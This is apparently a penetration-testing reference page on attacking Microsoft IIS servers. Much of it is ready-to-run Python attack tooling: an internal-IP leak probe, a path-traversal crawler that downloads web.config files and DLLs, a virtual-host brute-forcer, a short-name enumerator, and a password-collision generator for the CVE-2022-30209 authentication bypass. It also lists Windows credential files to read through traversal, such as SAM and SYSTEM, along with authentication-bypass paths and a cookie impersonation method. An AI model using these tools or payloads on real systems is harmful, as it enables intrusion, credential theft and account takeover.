IIS - Internet Information Services



Test executable file extensions:

  • asp

  • aspx

  • config

  • php

Internal IP Address disclosure

On any IIS server that answers with a 302 you can try removing the Host header and speaking HTTP/1.0; the Location header of the response may then point at an internal IP address, because the server builds the redirect target from its own binding instead of the name the client used:

nc -v domain.com 80
openssl s_client -connect domain.com:443

Response disclosing the internal IP:

GET / HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
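A scripted version of the probe above, added here as an example (it is not code from the original page): it sends the Host-less HTTP/1.0 request over plain TCP or TLS and flags every Location header whose host is a private, loopback or link-local IP literal. The sample response is constructed to mirror the one shown above; the host given on the command line is whatever server you are testing.

```python
import ipaddress
import re
import socket
import ssl
import sys

# HTTP/1.0 request with no Host header. Without a Host value the server may
# build the redirect target from its own binding, leaking the internal IP.
PROBE_REQUEST = b"GET / HTTP/1.0\r\n\r\n"

LOCATION_RE = re.compile(rb"^Location:[ \t]*(\S+)", re.IGNORECASE | re.MULTILINE)
# scheme://host where host is a bracketed IPv6 literal or a plain token
HOST_RE = re.compile(r"^[a-z][a-z0-9+.-]*://(\[[^\]]+\]|[^/:?#]+)", re.IGNORECASE)


def internal_ips_in_location(raw_response: bytes) -> list:
    """Return the hosts of all Location headers that are non-public IP literals."""
    leaked = []
    for match in LOCATION_RE.finditer(raw_response):
        target = match.group(1).decode("latin-1")
        host_match = HOST_RE.match(target)
        if not host_match:
            continue                      # relative redirect, nothing to learn
        host = host_match.group(1).strip("[]")
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            continue                      # a DNS name, not an IP literal
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            leaked.append(str(ip))
    return leaked


def probe(host: str, port: int = 443, use_tls: bool = True, timeout: float = 5.0) -> bytes:
    """Send PROBE_REQUEST and return the raw response (HTTP/1.0: server closes when done)."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False        # we are probing this server, not trusting it
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(PROBE_REQUEST)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Constructed sample mirroring the response shape shown above (not a capture).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 302 Moved Temporarily\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Pragma: no-cache\r\n"
    b"Location: https://192.168.5.237/owa/\r\n"
    b"Server: Microsoft-IIS/10.0\r\n"
    b"X-FEServer: NHEXCHANGE2016\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    # usage: python3 iis_internal_ip.py <host> [port]   (no arguments: run on the sample)
    if len(sys.argv) > 1:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
        raw = probe(sys.argv[1], port, use_tls=(port != 80))
    else:
        raw = SAMPLE_RESPONSE
    print("internal addresses in Location:", internal_ips_in_location(raw) or "none")
```

Run it against port 443 and port 80 separately: the HTTP and HTTPS bindings of an Exchange front end are often configured differently, and only one of them may leak.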

Execute .config files

You can upload .config files and use them to execute code. One way of doing it is appending the code at the end of the file inside an HTML comment: Download example here

More information and techniques to exploit this vulnerability here

IIS Discovery Bruteforce

Download the list I created:

It was created by merging the contents of the following lists:

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt
http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html
https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt
https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt

Use it without adding any extension; the entries that need one already have it.

Path Traversal

Leaking source code

Check the full writeup at: https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html

In summary, there are several web.config files inside the folders of the application containing references to "assemblyIdentity" files and "namespaces". With this information it is possible to know where the executables are located and download them. From the downloaded DLLs it is also possible to find new namespaces, where you should try to access and fetch the web.config file in order to discover further namespaces and assemblyIdentity entries. Also, the files connectionstrings.config and global.asax may contain interesting information.

In .Net MVC applications, the web.config file plays a crucial role by specifying every binary file the application relies on through "assemblyIdentity" XML tags.

Exploring Binary Files

An example of accessing the web.config file is shown below:

GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded

This request reveals various settings and dependencies, such as:

  • EntityFramework version

  • AppSettings for webpages, client validation, and JavaScript

  • System.web settings for authentication and runtime

  • System.webServer module settings

  • Runtime assembly binding configurations for numerous libraries like Microsoft.Owin, Newtonsoft.Json, and System.Web.Mvc

These settings indicate that certain files, such as /bin/WebGrease.dll, are located within the application's /bin folder.

Root Directory Files

Files found in the root directory, like /global.asax and /connectionstrings.config (which stores sensitive passwords), are essential for the configuration and operation of the application.

Namespaces and Web.Config

MVC applications also define additional web.config files for specific namespaces to avoid repetitive declarations in every file, as shown by the request to download another web.config:

GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded

Kupakua DLLs

The mention of a custom namespace hints at a DLL named "WebApplication1" present in the /bin directory. Following this, a request to download WebApplication1.dll is shown:

GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded

This suggests the presence of other essential DLLs, like System.Web.Mvc.dll and System.Web.Optimization.dll, in the /bin directory.

In a scenario where a DLL imports a namespace called WebApplication1.Areas.Minded, an attacker might infer the existence of other web.config files in predictable paths, such as /area-name/Views/, containing specific configurations and references to other DLLs in the /bin folder. For instance, a request to /Minded/Views/web.config can reveal configurations and namespaces that indicate the presence of another DLL, WebApplication1.AdditionalFeatures.dll.
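The walk described in this section can be automated. The following is an added example, not code from the writeup: it parses a web.config for assemblyIdentity names and custom namespaces, turns them into candidate paths under the web root (bin/<assembly>.dll, plus <Area>/Views/web.config for namespaces of the form X.Areas.<Area>), builds the traversal URL in the same shape as the requests above, and follows the references breadth-first. The download_page?id= parameter and the two-level ../ depth are taken from the example requests; the sample web.config is constructed here, and the "root namespace equals project DLL name" rule is a heuristic that the writeup does not state.

```python
import re
import urllib.request
import xml.etree.ElementTree as ET

# Traversal shape taken from the requests above: the vulnerable parameter is
# "id" and two levels of ../ (URL-encoded as ..%2f) reach the web root.
TRAVERSAL_PREFIX = "..%2f..%2f"


def local_name(tag: str) -> str:
    """Strip an XML namespace prefix such as {urn:schemas-microsoft-com:asm.v1}."""
    return tag.rsplit("}", 1)[-1]


def parse_web_config(data) -> dict:
    """Collect assemblyIdentity names and <add namespace="..."/> entries."""
    if isinstance(data, str):
        data = data.encode("utf-8")       # let expat honour the declared encoding
    root = ET.fromstring(data)
    assemblies, namespaces = [], []
    for el in root.iter():
        tag = local_name(el.tag)
        if tag == "assemblyIdentity" and el.get("name"):
            assemblies.append(el.get("name"))
        elif tag == "add" and el.get("namespace"):
            namespaces.append(el.get("namespace"))
    return {"assemblies": assemblies, "namespaces": namespaces}


def candidate_paths(info: dict) -> list:
    """Turn parsed names into paths worth requesting, relative to the web root."""
    paths = []
    for asm in info["assemblies"]:
        paths.append(f"bin/{asm}.dll")               # bindings name the DLLs in /bin
    for ns in info["namespaces"]:
        if ns.startswith(("System.", "Microsoft.")):
            continue                                  # framework namespaces, not app code
        paths.append(f"bin/{ns.split('.')[0]}.dll")  # heuristic: root namespace = project DLL
        area = re.match(r"^[\w.]+\.Areas\.(\w+)$", ns)
        if area:
            paths.append(f"{area.group(1)}/Views/web.config")  # MVC area-level web.config
    return list(dict.fromkeys(paths))                 # de-duplicate, keep order


def traversal_url(base: str, path: str, param: str = "id") -> str:
    """Build the download URL exactly as in the requests above."""
    return f"{base.rstrip('/')}/download_page?{param}={TRAVERSAL_PREFIX}{path}"


def fetch(url: str, timeout: float = 10.0) -> bytes:
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def crawl(base: str, start: str = "web.config", max_files: int = 50) -> dict:
    """Follow web.config -> DLL / area web.config references; returns path -> bytes."""
    queue, seen, out = [start], set(), {}
    while queue and len(out) < max_files:
        path = queue.pop(0)
        if path in seen:
            continue
        seen.add(path)
        try:
            data = fetch(traversal_url(base, path))
        except Exception as exc:             # 404s and timeouts are expected while guessing
            print(f"[-] {path}: {exc}")
            continue
        out[path] = data
        print(f"[+] {path} ({len(data)} bytes)")
        if path.endswith("web.config"):
            try:
                queue.extend(candidate_paths(parse_web_config(data)))
            except ET.ParseError:
                pass                           # not XML, nothing more to follow
    return out


# Constructed sample web.config (not taken from any real application).
SAMPLE_WEB_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.web.webPages.razor>
    <pages pageBaseType="System.Web.Mvc.WebViewPage">
      <namespaces>
        <add namespace="System.Web.Mvc" />
        <add namespace="WebApplication1" />
        <add namespace="WebApplication1.Areas.Minded" />
      </namespaces>
    </pages>
  </system.web.webPages.razor>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="Newtonsoft.Json" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-12.0.0.0" newVersion="12.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Mvc" culture="neutral" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        crawl(sys.argv[1])                   # e.g. http://example-mvc-application.minded
    else:
        for p in candidate_paths(parse_web_config(SAMPLE_WEB_CONFIG)):
            print(traversal_url("http://example-mvc-application.minded", p))
```

Downloaded DLLs are not parsed here; run them through a .NET decompiler and feed any new namespaces you find back in as further candidate paths.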

Common files

From here

C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
C:\Program Files (x86)\php\php.ini
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml

HTTPAPI 2.0 404 Error

If you get a 404 like the following one, served by HTTPAPI 2.0 rather than by an IIS site:

It means that the server didn't receive the correct domain name inside the Host header. In order to reach the web page you could take a look at the SSL certificate being served and maybe you can find the domain/subdomain name there. If it isn't there you may need to brute force VHosts until you find the correct one.
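Pulling the names out of the certificate and trying them as Host values can be scripted. This is an added example, not code from the original page: it shells out to openssl (as the s_client command earlier on this page does) to dump the certificate as text, extracts the CN and the DNS entries of the Subject Alternative Name (dropping the wildcard label, so *.corp.example.com yields corp.example.com as a candidate and as the base to brute force under), then requests / with each candidate in the Host header and reports status and body size so the virtual host that answers differently stands out. The certificate text in the sample is constructed.

```python
import http.client
import re
import ssl
import subprocess

SAN_RE = re.compile(r"DNS:([A-Za-z0-9*.-]+)")
CN_RE = re.compile(r"^\s*Subject:.*?\bCN\s*=\s*([A-Za-z0-9*.-]+)", re.MULTILINE)


def names_from_cert_text(text: str) -> list:
    """CN and SAN hostnames from `openssl x509 -text` output, de-duplicated, wildcards stripped."""
    names = []
    for raw in CN_RE.findall(text) + SAN_RE.findall(text):
        name = raw.lower()
        if name.startswith("*."):
            name = name[2:]            # *.corp.example.com -> corp.example.com
        if name and name not in names:
            names.append(name)
    return names


def cert_text(ip: str, port: int = 443) -> str:
    """Fetch the leaf certificate with openssl s_client and render it as text."""
    s_client = subprocess.run(
        ["openssl", "s_client", "-connect", f"{ip}:{port}"],
        input=b"", capture_output=True, timeout=15, check=False)
    x509 = subprocess.run(["openssl", "x509", "-noout", "-text"],
                          input=s_client.stdout, capture_output=True, timeout=15, check=True)
    return x509.stdout.decode("utf-8", "replace")


def try_host(ip: str, host: str, port: int = 443, use_tls: bool = True) -> tuple:
    """GET / with an explicit Host header; returns (host, status, body length)."""
    if use_tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname, ctx.verify_mode = False, ssl.CERT_NONE
        conn = http.client.HTTPSConnection(ip, port, context=ctx, timeout=10)
    else:
        conn = http.client.HTTPConnection(ip, port, timeout=10)
    try:
        conn.request("GET", "/", headers={"Host": host})
        resp = conn.getresponse()
        return host, resp.status, len(resp.read())
    finally:
        conn.close()


# Constructed sample of `openssl x509 -text` output (not a real certificate).
SAMPLE_CERT_TEXT = """Certificate:
    Data:
        Issuer: CN = Example Internal CA
        Subject: C = US, O = Example, CN = mail.example.com
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:mail.example.com, DNS:autodiscover.example.com, DNS:*.corp.example.com
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        ip = sys.argv[1]
        for name in names_from_cert_text(cert_text(ip)):
            host, status, size = try_host(ip, name)
            print(f"{host:40} {status} {size} bytes")
    else:
        print(names_from_cert_text(SAMPLE_CERT_TEXT))
```

Only the Host header varies here; the connection is made to the IP literal, so no SNI is sent. If the server also routes on SNI, the name must be supplied there as well.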

Old IIS vulnerabilities worth looking for

Microsoft IIS tilde character "~" Vulnerability/Feature – Short File/Folder Name Disclosure

You can try to enumerate folders and files inside every discovered folder (even if it requires Basic Authentication) using this technique. The main limitation of this technique, if the server is vulnerable, is that it can only find up to the first 6 letters of the name of each file/folder and the first 3 letters of the extension of the files.

You can use https://github.com/irsdl/IIS-ShortName-Scanner to test for this vulnerability:

java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

Original research: https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf

You can also use metasploit: use scanner/http/iis_shortname_scanner
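The core of the short-name enumeration fits in a few dozen lines. This is an added example written for this page, not the IIS-ShortName-Scanner or Metasploit code: it relies on the classic signal that a pattern such as a*~1*/.aspx gets a 404 when some 8.3 name matches and a 400 when none does, walks the name one character at a time (6 characters at most) and then the extension (3 at most). The probe function is injectable, so the block runs offline against a simulated directory whose 8.3 names are produced with a simplified rule; the charset and the /.aspx magic suffix are the usual choices, and real servers may need other suffixes or HTTP methods.

```python
import fnmatch
import string
import urllib.error
import urllib.parse
import urllib.request

# Characters tried at each position. 8.3 names are case-insensitive, so lower
# case is enough; real scanners also try the other legal punctuation.
CHARSET = string.ascii_lowercase + string.digits + "_-"
MAGIC = "/.aspx"   # suffix that routes the request to a handler showing the 404/400 difference


def http_probe(url: str, timeout: float = 5.0) -> int:
    """Return the HTTP status for a GET, treating error statuses as data."""
    try:
        with urllib.request.urlopen(urllib.request.Request(url), timeout=timeout) as r:
            return r.status
    except urllib.error.HTTPError as e:
        return e.code


def matches(probe, base: str, pattern: str) -> bool:
    """Vulnerable IIS: 404 when some short name matches the pattern, 400 when none does."""
    return probe(f"{base}{pattern}{MAGIC}") == 404


def is_vulnerable(probe, base: str) -> bool:
    # Something must match the catch-all, and an impossible 8.3 prefix must not.
    return matches(probe, base, "*~1*") and not matches(probe, base, "1234567890*~1*")


def enum_names(probe, base: str, prefix: str = "", max_len: int = 6) -> list:
    names = []
    if prefix and matches(probe, base, f"{prefix}~1*"):
        names.append(prefix)                 # exactly this 8.3 stem exists
    if len(prefix) < max_len:
        for c in CHARSET:
            if matches(probe, base, f"{prefix}{c}*~1*"):
                names.extend(enum_names(probe, base, prefix + c, max_len))
    return names


def enum_extensions(probe, base: str, name: str, prefix: str = "", max_len: int = 3) -> list:
    exts = []
    if prefix and matches(probe, base, f"{name}~1.{prefix}"):
        exts.append(prefix)                  # exact extension (no trailing wildcard)
    if len(prefix) < max_len:
        for c in CHARSET:
            if matches(probe, base, f"{name}~1.{prefix}{c}*"):
                exts.extend(enum_extensions(probe, base, name, prefix + c, max_len))
    return exts


def scan(probe, base: str) -> dict:
    """Map each recovered stem to its extensions ('' means directory / no extension)."""
    result = {}
    for name in enum_names(probe, base):
        exts = [""] if matches(probe, base, f"{name}~1") else []
        result[name] = exts + enum_extensions(probe, base, name)
    return result


# ---- offline simulation so the algorithm can be exercised without a server ----
def short_name_8_3(entry: str) -> str:
    """Simplified NTFS 8.3 rule: first 6 chars of the stem, ~1, first 3 of the extension."""
    stem, _, ext = entry.rpartition(".") if "." in entry else (entry, "", "")
    return stem[:6].upper() + "~1" + (f".{ext[:3].upper()}" if ext else "")


def make_fake_probe(entries, base_path: str = "/dev/"):
    """Answer like a vulnerable IIS for the directory listing `entries` (constructed sample)."""
    shorts = [short_name_8_3(e).lower() for e in entries]

    def probe(url: str) -> int:
        path = urllib.parse.urlparse(url).path
        if not (path.startswith(base_path) and path.endswith(MAGIC)):
            return 404
        pattern = path[len(base_path):-len(MAGIC)].lower()
        return 404 if any(fnmatch.fnmatchcase(s, pattern) for s in shorts) else 400

    return probe


SAMPLE_ENTRIES = ["aspnet_client", "Default.aspx", "web.config", "secret_backup.zip"]

if __name__ == "__main__":
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else "http://10.13.38.11/dev/"
    probe = http_probe if len(sys.argv) > 1 else make_fake_probe(SAMPLE_ENTRIES)
    if is_vulnerable(probe, base):
        for stem, exts in scan(probe, base).items():
            print(stem + "~1", exts)
    else:
        print("target does not show the 404/400 short-name signal")
```

Against a real server the recursion issues one request per character per discovered prefix, so throttle or parallelise as the engagement allows; the simulated run recovers ASPNET~1, DEFAUL~1.ASP, WEB~1.CON and SECRET~1.ZIP from the sample listing.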

Basic Authentication bypass

Bypass a basic authentication (IIS 7.5) by trying to access: /admin:$i30:$INDEX_ALLOCATION/admin.php or /admin::$INDEX_ALLOCATION/admin.php

You can try to mix this vulnerability with the previous one to find new folders and bypass the authentication.

ASP.NET Trace.AXD enabled debugging

ASP.NET includes a debugging mode whose file is called trace.axd.

It keeps a very detailed log of all requests made to an application over a period of time.

This information includes remote client IPs, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords.

https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/

ASPXAUTH uses the following information:

  • validationKey (string): hex-encoded key to use for signature validation.

  • decryptionMethod (string): (default "AES").

  • decryptionIV (string): hex-encoded initialization vector (defaults to a vector of zeros).

  • decryptionKey (string): hex-encoded key to use for decryption.

However, some people will use the default values of these parameters and will use the email of the user as the cookie. Therefore, if you can find a web application built on the same platform that uses the ASPXAUTH cookie and you create a user with the email of the user you want to impersonate on the server under attack, you may be able to use the cookie from the second server on the first one and impersonate the user. This attack worked in this writeup.

IIS Authentication Bypass with cached passwords (CVE-2022-30209)

Full report here: A bug in the code didn't properly check the password supplied by the user, so an attacker whose password hash collides with a key that is already in the cache will be able to log in as that user.

# script for sanity check
> type test.py
def HashString(password):
    j = 0
    for c in map(ord, password):
        j = c + (101*j)&0xffffffff
    return j

assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')

# before the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 401 Unauthorized

# after the successful login (the legitimate user "orange" has authenticated once, so the hash of the real password is now cached)
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
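The sanity-check script above only confirms one known pair. The block below is an added example, not code from the original report: it reimplements the hash and then constructs a colliding 6-character alphanumeric password for any target with a meet-in-the-middle search. Because the hash is a polynomial in 101 modulo 2^32, hash(p + q) = 101^3 * hash(p) + hash(q) for 3-character halves, so a table of every 3-character prefix can be joined against every 3-character suffix in about a second. The default target is the password string from the report; the 6-character result is what an attacker would present as the password once the legitimate user's hash sits in the cache.

```python
import itertools
import string

MOD = 1 << 32
ALPHABET = string.ascii_letters + string.digits   # candidates stay typeable in a Basic-Auth prompt


def hash_string(password: str) -> int:
    """The hash from the report: j = c + 101*j, truncated to 32 bits."""
    j = 0
    for c in map(ord, password):
        j = (c + 101 * j) & 0xFFFFFFFF
    return j


def find_collision(target_password: str, half: int = 3, alphabet: str = ALPHABET):
    """Return a (2*half)-character string with the same hash as target_password, or None."""
    target = hash_string(target_password)
    # hash(p + q) = shift * hash(p) + hash(q)  (mod 2^32), with shift = 101**half
    shift = pow(101, half, MOD)
    inv_shift = pow(shift, -1, MOD)          # 101 is odd, so it is invertible mod 2^32
    prefixes = {}
    for p in itertools.product(alphabet, repeat=half):
        s = "".join(p)
        prefixes.setdefault(hash_string(s), s)  # one representative prefix per hash value
    for q in itertools.product(alphabet, repeat=half):
        s = "".join(q)
        need = ((target - hash_string(s)) * inv_shift) % MOD
        p = prefixes.get(need)
        if p is not None and p + s != target_password:
            return p + s
    return None


if __name__ == "__main__":
    import sys
    pw = sys.argv[1] if len(sys.argv) > 1 else "test-for-CVE-2022-30209-auth-bypass"
    alt = find_collision(pw)
    print(f"{pw!r} -> 0x{hash_string(pw):08x}")
    print("colliding password:", alt, f"-> 0x{hash_string(alt):08x}" if alt else "")
```

With 62 characters per position the 6-character space (about 5.7e10 strings) covers the 32-bit output many times over, so a collision is found for practically any target; if a particular password is unlucky, raise half to 4 at the cost of a larger prefix table.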
